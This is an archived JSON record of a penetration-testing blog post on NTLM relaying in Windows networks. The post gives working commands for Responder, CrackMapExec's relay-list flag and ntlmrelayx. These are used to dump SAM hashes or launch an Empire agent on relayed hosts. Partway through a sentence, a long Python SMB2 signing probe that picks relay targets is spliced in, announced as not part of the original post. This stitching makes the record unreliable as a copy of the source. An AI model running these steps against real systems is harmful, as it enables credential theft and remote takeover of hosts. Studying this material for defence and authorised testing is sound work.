{
	"id": "83c5e967-01ec-4a0d-903f-b92651a3e570",
	"created_at": "2026-04-06T00:18:52.753203Z",
	"updated_at": "2026-04-10T13:12:13.25082Z",
	"deleted_at": null,
	"sha1_hash": "269d282b0f83dc3089feef5ffa320341e68642a7",
	"title": "Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 79936,
	"plain_text": "Practical guide to NTLM Relaying in 2017 (A.K.A getting a\r\nfoothold in under 5 minutes) // byt3bl33d3r // /dev/random\r\nArchived: 2026-04-05 20:26:34 UTC\r\nThis blog post is mainly aimed to be a very 'cut \u0026 dry' practical guide to help clear up any confusion regarding\r\nNTLM relaying. Talking to pentesters I've noticed that there seems to be a lot of general confusion regarding what\r\nyou can do with those pesky hashes you get with Responder. I also noticed there doesn't seem to be an up to date\r\nguide on how to do this on the interwebs, and the articles that I did see about the subject either reference tools that\r\nare outdated, broken and/or not maintained anymore.\r\nI won't go into detail on all the specifics since there are a TON of papers out there detailing how the attack\r\nactually works, this one from SANS is a ok when it comes to the theory behind the attack.\r\nBefore we dive into the thick of it we need make sure we are on the same page with a couple of things.\r\nNTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2\r\nThis is where the confusion starts for a lot of people and quite frankly I don't blame them because all of the\r\narticles about this attack talk about NTLMv1/v2, so when they see Net-NTLMv1/v2 anywhere obviously people\r\nwonder if it's the same thing.\r\nEdit 06/05/2017 - Updated the TL;DR as it was brought to my attention the way I phrased it was still\r\nconfusing.\r\nTL;DR NTLMv1/v2 is a shorthand for Net-NTLMv1/v2 and hence are the same thing.\r\nHowever, NTLM (without v1/v2) means something completely different.\r\nNTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller's NTDS.dit\r\ndatabase. They look like this:\r\naad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42\r\nContrary to what you'd expect, the LM hash is the one before the semicolon and the NT hash is the one after the\r\nsemicolon. 
Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.\r\nNet-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and\r\nare based on the user's NT hash). Here's an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:\r\nadmin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c\r\n(This hash was taken from the Hashcat example hash page here)\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\r\nPage 1 of 4\n\nFrom a pentesting perspective:\r\nYou CAN perform Pass-The-Hash attacks with NTLM hashes.\r\nYou CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.\r\nYou get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit\r\ndatabase or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows \u003e=\r\n8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's\r\nperfectly fine: obviously you can still Pass-The-Hash with just the NT hash.\r\nYou get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.\r\nThis article is going to be talking about what you can do with Net-NTLM in modern Windows environments.\r\nRelaying 101\r\nSince MS08-068 you cannot relay a Net-NTLM hash back to the same machine you got it from (i.e. the\r\n'reflective' attack) unless you're performing a cross-protocol relay (which is an entirely different topic). However\r\nyou can still relay the hash to another machine.\r\nTL;DR you don't have to crack the hashes you get from Responder, you can directly relay them to other\r\nmachines!\r\nWhat's really cool about this? You can use Responder in combination with a relay tool to automatically intercept\r\nconnections and relay authentication hashes!\r\nThe only caveat to this attack? 
SMB Signing needs to be disabled (more precisely: not required) on the machine you're relaying to. Out of the box, the only Windows systems that require SMB Signing are Domain Controllers; workstations and member servers do not, so by default they are all valid relay targets.\r\nPersonally, I consider SMB Signing to be one of the most overlooked and underrated security settings in Windows\r\nspecifically because of this attack and how easy it allows for attackers to gain an initial foothold.\r\nSetting up\r\nGrab Responder (do not use the version of Responder on SpiderLab's Github repository as it isn't maintained\r\nanymore, you should be using lgandx's fork), edit the Responder.conf file and turn off the SMB and HTTP servers:\r\n[Responder Core]\r\n; Servers to start\r\nSQL = On\r\nSMB = Off # Turn this off\r\nKerberos = On\r\nFTP = On\r\nPOP = On\r\nSMTP = On\r\nIMAP = On\r\nHTTP = Off # Turn this off\r\nHTTPS = On\r\nDNS = On\r\nLDAP = On\r\nNow you need a relaying tool.\r\nThere are 2 main tools that are maintained and updated regularly that can be used to perform relay attacks with\r\nNet-NTLMv1/v2 hashes:\r\nntlmrelayx.py which comes with the Impacket library\r\nMultiRelay.py that comes with the Responder toolkit.\r\nI personally use ntlmrelayx.py so I'll stick with that for this blogpost.\r\nInstall Impacket using pip or manually by git cloning the repo and running the setup file; either way it will put the\r\nntlmrelayx.py script in your path.\r\nNow you need a list of targets to relay to.\r\nHow you do that is up to you. 
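For anyone who wants to see what 'SMB Signing disabled' actually means on the wire before trusting a tool to decide it, here is an added Python example (not code from the original post, nor from CrackMapExec or Impacket) that builds a bare SMB2 NEGOTIATE request, parses the SecurityMode field of the server's reply, and keeps only hosts that do not require signing, which is the same rule a relay-list generator has to apply. The two server replies and the host addresses in the offline demo are constructed; the live probe_signing function talks to port 445 and is only used when hosts are given on the command line.

```python
import socket
import struct

# SMB2 NEGOTIATE SecurityMode flags (MS-SMB2 2.2.4).
SMB2_SIGNING_ENABLED = 0x0001
SMB2_SIGNING_REQUIRED = 0x0002
SMB2_MAGIC = bytes([0xFE]) + b'SMB'

def smb2_negotiate_request(dialects=(0x0202, 0x0210)):
    # 64-byte SMB2 header for command 0 (NEGOTIATE), message id 0, no session.
    header = SMB2_MAGIC + struct.pack('<HHIHHIIQIIQ', 64, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0) + bytes(16)
    # NEGOTIATE body: StructureSize 36, DialectCount, SecurityMode, Reserved,
    # Capabilities, ClientGuid (16), ClientStartTime (8), then the dialect list.
    # We advertise signing ENABLED but not REQUIRED, which is exactly the stance a
    # relaying client takes: it cannot sign, so it must not ask for signing.
    body = struct.pack('<HHHHI', 36, len(dialects), SMB2_SIGNING_ENABLED, 0, 0) + bytes(16) + bytes(8)
    body += struct.pack('<%dH' % len(dialects), *dialects)
    msg = header + body
    # NetBIOS session service header: type 0x00 plus a 24-bit big-endian length.
    return struct.pack('>I', len(msg)) + msg

def parse_negotiate_response(data):
    # data is one SMB2 message with the NetBIOS header already stripped.
    if len(data) < 64 + 6 or data[:4] != SMB2_MAGIC:
        raise ValueError('not an SMB2 message')
    status, command = struct.unpack_from('<IH', data, 8)
    if command != 0 or status != 0:
        raise ValueError('not a successful NEGOTIATE response')
    structure_size, security_mode, dialect = struct.unpack_from('<HHH', data, 64)
    if structure_size != 65:
        raise ValueError('unexpected NEGOTIATE response size %d' % structure_size)
    return {
        'dialect': dialect,
        'signing_enabled': bool(security_mode & SMB2_SIGNING_ENABLED),
        'signing_required': bool(security_mode & SMB2_SIGNING_REQUIRED),
    }

def is_relay_target(info):
    # Relaying works whenever the server does not REQUIRE signing. Enabled-but-not-
    # required (the workstation default) still accepts our unsigned relayed session.
    return not info['signing_required']

def constructed_negotiate_response(security_mode, dialect=0x0210):
    # Constructed server reply (not a real capture) carrying the given SecurityMode.
    header = SMB2_MAGIC + struct.pack('<HHIHHIIQIIQ', 64, 0, 0, 0, 1, 0x01, 0, 0, 0, 0, 0) + bytes(16)
    body = struct.pack('<HHHH', 65, security_mode, dialect, 0) + bytes(16)
    body += struct.pack('<IIIIQQHHI', 0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0) + bytes(1)
    return header + body

def select_relay_targets(responses):
    # responses: {host: raw SMB2 NEGOTIATE response}. Returns the hosts you would
    # feed to ntlmrelayx -tf, one per line, the way a relay-list generator does.
    return [host for host, raw in responses.items() if is_relay_target(parse_negotiate_response(raw))]

def _recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('connection closed early')
        buf += chunk
    return buf

def probe_signing(host, port=445, timeout=3):
    # Live version: one NEGOTIATE round trip, then read the server's SecurityMode.
    # SMB1-only hosts (XP / 2003) will not answer an SMB2-only negotiate.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(smb2_negotiate_request())
        length = struct.unpack('>I', _recv_exact(sock, 4))[0] & 0x00FFFFFF
        return parse_negotiate_response(_recv_exact(sock, length))

if __name__ == '__main__':
    import sys
    if sys.argv[1:]:
        # Live use: python this_script.py 10.0.0.21 10.0.0.22 > targets.txt
        for host in sys.argv[1:]:
            try:
                if is_relay_target(probe_signing(host)):
                    print(host)
            except (OSError, ValueError) as exc:
                print('%s: %s' % (host, exc), file=sys.stderr)
    else:
        # Offline demo on constructed replies: a workstation-style host (signing
        # enabled, not required) and a domain-controller-style host (required).
        sample = {
            '10.0.0.21': constructed_negotiate_response(SMB2_SIGNING_ENABLED),
            '10.0.0.5': constructed_negotiate_response(SMB2_SIGNING_ENABLED | SMB2_SIGNING_REQUIRED),
        }
        print('relay targets:', select_relay_targets(sample))
```

The point to take away is the bit being tested: SMB2_NEGOTIATE_SIGNING_ENABLED on its own does not protect a host, only SMB2_NEGOTIATE_SIGNING_REQUIRED does, and that is the bit a Domain Controller sets and a default workstation does not.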
I personally use CrackMapExec: V4 has a handy --gen-relay-list flag just for\r\nthis:\r\ncme smb \u003cCIDR\u003e --gen-relay-list targets.txt\r\nThe above command will generate a list of all hosts with SMB Signing disabled (i.e. not required) and output them to the specified\r\nfile.\r\n0wning Stuff\r\nNow that you have everything you need, fire up Responder in one terminal window:\r\npython Responder.py -I \u003cinterface\u003e -r -d -w\r\nAnd ntlmrelayx.py in another:\r\nntlmrelayx.py -tf targets.txt\r\nBy default, upon a successful relay ntlmrelayx.py will dump the SAM database of the target.\r\nBuuuuut, you know what's even better? How about executing a command?\r\nntlmrelayx.py -tf targets.txt -c \u003cinsert your Empire Powershell launcher here\u003e\r\nNow, every time ntlmrelayx.py successfully relays a Net-NTLM hash, you will get an Empire agent! How cool is\r\nthat??!\r\nHere's a video of what it looks like in practice:\r\nLet's recap\r\n1. We're using Responder to intercept authentication attempts (Net-NTLM hashes) via Multicast/Broadcast\r\nprotocols.\r\n2. However, since we turned off Responder's SMB and HTTP servers and have ntlmrelayx.py running, those\r\nauthentication attempts get automatically passed to ntlmrelayx.py's SMB and HTTP servers.\r\n3. ntlmrelayx.py takes over and relays those hashes to our target list. If the relay is successful it will execute\r\nour Empire launcher and give us an Empire Agent on the target machine.\r\nConclusion\r\nSMB Relaying attacks are very much still relevant. 
Having SMB Signing disabled in combination with\r\nMulticast/Broadcast protocols allows attackers to seamlessly intercept authentication attempts, relay them to other\r\nmachines and gain an initial foothold on an Active Directory network in a matter of minutes.\r\nNow, combine this with something like DeathStar and you have automated everything from getting a foothold to\r\ngaining Domain Admin rights!\r\nShout outs\r\nThese are the people responsible for these amazing tools, hard work and research. You should be following them\r\neverywhere!\r\nagsolino\r\ndirkjanm\r\nlgandx\r\nSource: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
	],
	"report_names": [
		"practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434732,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.pdf",
		"text": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.txt",
		"img": "https://archive.orkl.eu/269d282b0f83dc3089feef5ffa320341e68642a7.jpg"
	}
}